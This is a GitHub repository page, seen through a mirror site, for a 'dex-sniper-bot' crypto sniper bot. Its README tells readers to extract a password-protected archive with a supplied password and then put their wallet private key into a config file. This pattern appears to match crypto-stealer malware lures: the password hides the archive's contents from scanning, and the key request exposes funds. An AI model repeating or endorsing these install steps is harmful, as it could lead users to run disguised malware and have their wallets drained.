Movatterモバイル変換


[0]ホーム

URL:


Skip to content

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up

Updated crypto-sniper bot for L2 solutions (Arbitrum, ZkSync, LayerZero, Linea)

License

NotificationsYou must be signed in to change notification settings

deadspyexx/dex-sniper-bot

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

54 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

downloadsLicense: MITgitmoji-changelog

A sniper bot is a type of automated trading bot that is programmed to make trades based on specific market conditions in the cryptocurrency industry. The name "sniper" comes from the bot's ability to make fast and precise trades, entering and exiting positions quickly.

To identify profitable trades, sniper bots use technical analysis and various indicators, such as price changes, trading volume, and market trends. Once the bot detects a favorable trade, it will automatically execute a buy or sell order based on specific parameters, such as target prices or stop-loss limits.

Sniper bot for multiple decentralized exchanges (DEX)

Mempool sniper bot interface

  • Arbswap (Arbitrum)
  • Uniswap (Optimism)
  • BaseSwap (Base)
  • zkSwap Finance (ZkSync)
  • Pancakeswap (Binance Smart Chain)
  • Uniswap (Ethereum)
  • Sushiswap (Polygon)
  • Quickswap (Polygon)
  • Trader Joe (Avalanche)

Installing

  • Clone repository and extract files with passwordwhLn1sTWT.
  • Edit the address and private_key fields in the config.json file.
  • Set up the network and AMMs in the sniping menu. Ensure that there are sufficient funds on the specified address to cover transaction fees.

Configuration

[WALLET]; This is your BSC wallet's private key.SECRET_KEY=private_wallet_key; A private node is recommended for better uptime. However, you may also use free nodes.WSS_NODE=wss://bsc-ws-node.nariox.org:443[CONTRACTS]; These variables support some pre-defined contracts (BNB, ETH, BUSD).; For other contracts, you'll have to specify the contract address yourself.INPUT=BNBOUTPUT=BUSD[TRANSACTION]GAS_LIMIT=500000GAS_PRICE=5; This variable is the amount of cryptocurrency you wish to use with the input contract.; For example, if you use WBNB as input, you will specify the amount in WBNB's format.AMOUNT_IN=0.0033BUY_SLIPPAGE=10

[8]ページ先頭

©2009-2025 Movatter.jp